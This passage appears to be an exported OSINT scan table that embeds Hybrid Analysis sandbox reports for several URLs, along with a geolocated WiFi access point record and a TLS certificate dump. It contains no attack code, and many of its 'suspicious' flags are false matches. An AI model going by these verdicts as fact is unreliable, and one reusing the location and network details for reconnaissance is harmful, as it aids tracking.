/css/e6fea20c42addb734e27fc610f911e9bbcdf079f/styles/dist/styles.css HTTP/1.1\nAccept: text/css, */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: d33wubrfki0l68.cloudfront.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /e278deffc2dc2e5c432309dc70e3af4ccc3c4a8a/dc9c6/font/fontello.eot HTTP/1.1\nAccept: */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://dockeer.space\nAccept-Encoding: gzip, deflate\nHost: d33wubrfki0l68.cloudfront.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /e278deffc2dc2e5c432309dc70e3af4ccc3c4a8a/dc9c6/font/fontello.eot HTTP/1.1\nAccept: */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://dockeer.space\nAccept-Encoding: gzip, deflate\nHost: d33wubrfki0l68.cloudfront.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /css?family=Oxygen|Roboto+Mono HTTP/1.1\nAccept: text/css, */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css?family=Oxygen|Roboto+Mono HTTP/1.1\nAccept: text/css, */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /buttons.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: buttons.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /buttons.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: buttons.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /buttons.html HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: buttons.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /buttons.html HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: buttons.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /buttons.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://buttons.github.io/buttons.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: buttons.github.io\nIf-Modified-Since: Thu, 19 Jan 2023 07:14:03 GMT\nIf-None-Match: W/"63c8edbb-4e0b"\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /buttons.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://buttons.github.io/buttons.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: buttons.github.io\nIf-Modified-Since: Thu, 19 Jan 2023 07:14:03 GMT\nIf-None-Match: W/"63c8edbb-4e0b"\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /ajax/libs/lazysizes/5.2.0/lazysizes.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: cdnjs.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /ajax/libs/lazysizes/5.2.0/lazysizes.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: cdnjs.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/oxygen/v15/2sDfZG1Wl4LcnbuKjk0g.woff HTTP/1.1\nAccept: */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://dockeer.space\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/oxygen/v15/2sDfZG1Wl4LcnbuKjk0g.woff HTTP/1.1\nAccept: */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://dockeer.space\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /repos/prakhar1989/docker-curriculum HTTP/1.1\nAccept: */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nOrigin: http://dockeer.space\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: api.github.com\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "mozilla/5.0 (")\n "GET /repos/prakhar1989/docker-curriculum HTTP/1.1\nAccept: */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nOrigin: http://dockeer.space\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: api.github.com\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "user-agent: ")\n "GET /repos/prakhar1989/docker-curriculum HTTP/1.1\nAccept: */*\nReferer: https://buttons.github.io/buttons.html\nAccept-Language: en-US\nOrigin: https://buttons.github.io\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: api.github.com\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "mozilla/5.0 (")\n "GET /repos/prakhar1989/docker-curriculum HTTP/1.1\nAccept: */*\nReferer: https://buttons.github.io/buttons.html\nAccept-Language: en-US\nOrigin: https://buttons.github.io\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: api.github.com\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.127.239.132:80"\n "18.155.204.113:443"\n "142.250.191.42:443"\n "185.199.111.153:443"\n "104.17.25.14:443"\n "142.251.46.163:443"\n "192.30.255.117:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dockeer.space"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "dockeer.space"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_8a0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_8a0_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_8a0_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_8a0_IE_EarlyTabStart_0x7a4_Mutex"\ | 185.199.111.153 |
| 2023-05-12 02:52:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 22, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://rtm516.github.io/ConvertJavaTextureToBedrock/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6464:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6464:304:WilStaging_02"\n "SM0:6464:120:WilError_01"\n "SM0:6464:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "138.91.254.96:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "rtm516.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""blingbykey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""boosted-luckey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""bowlingmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""burgeonbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""busybeescrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1500_2144953265\\shopping.js]- [targetUID: 00000000-00001500]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001500]\n "Ruleset Data" has type "data"- [targetUID: 00000000-00001500]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\1500_716964329\\edge_driver.js]- [targetUID: 00000000-00001500]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1500_2144953265\\edge_driver.js]- [targetUID: 00000000-00001500]\n "befed62da3532265_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\CacheStorage\\0f58391e52a89803d09945cd7804d55a50ce4089\\bd10416f-03b7-45e1-866b-dec341d9cdb3\\befed62da3532265_1]- [targetUID: 00000000-00001500]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\1500_547013199\\Filtering Rules]- [targetUID: 00000000-00001500]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00001500]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "befed62da3532265_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\CacheStorage\\0f58391e52a89803d09945cd7804d55a50ce4089\\bd10416f-03b7-45e1-866b-dec341d9cdb3\\befed62da3532265_0]- [targetUID: 00000000-00001500]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1500_2144953265\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00001500]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1500_2144953265\\product_page.js]- [targetUID: 00000000-00001500]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1500_2144953265\\edge_checkout_page_validator.js]- [targetUID: 00000000-00001500]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1500_2144953265\\auto_open_controller.js]- [targetUID: 00000000-00001500]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00001500]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00001500]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\1500_716964329\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00001500]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00001500]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\1500_547013199\\Filtering Rules-AA]- [targetUID: 00000000-00001500]\n "load_statistics.db" has | 185.199.108.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:2F:5E:C5) | 39.0469, -77.4903 |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webmail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 02:50:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/enterprise/contact', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://github.co/hiddenchars', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6228:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:6228:304:WilStaging_02"\n "SM0:6228:120:WilError_01"\n "Local\\SM0:6228:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.43.221.31:443"\n "138.91.254.96:443"\n "192.0.66.2:443"\n "104.17.24.14:443"\n "185.199.108.153:443"\n "192.0.76.3:443"\n "192.0.77.2:443"\n "140.82.112.21:443"\n "185.199.108.154:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"analytics.githubassets.com"\n "api.edgeoffer.microsoft.com"\n "cdnjs.cloudflare.com"\n "collector.githubapp.com"\n "github.blog"\n "github.co"\n "github.githubassets.com"\n "i0.wp.com"\n "pixel.wp.com"\n "stats.wp.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta property="article:publisher" content="https://www.facebook.com/GitHub" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<meta name="twitter:card" content="summary_large_image" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<meta name="twitter:site" content="@github" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<meta name="twitter:label1" content="Est. reading time" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<meta name="twitter:data1" content="1 minute" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n file/memory contains long string with (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<a href="https://twitter.com/github" data-ga-click="Blog\n go to Twitter\n resources footer" style="color: #959da5;">" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<span class="sr-only">GitHub on Twitter</span>" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<a href="https://www.facebook.com/GitHub" data-ga-click="Blog\n go to Facebook\n resources footer" style="color: #959da5;">" (Indicator: "dir "; File: 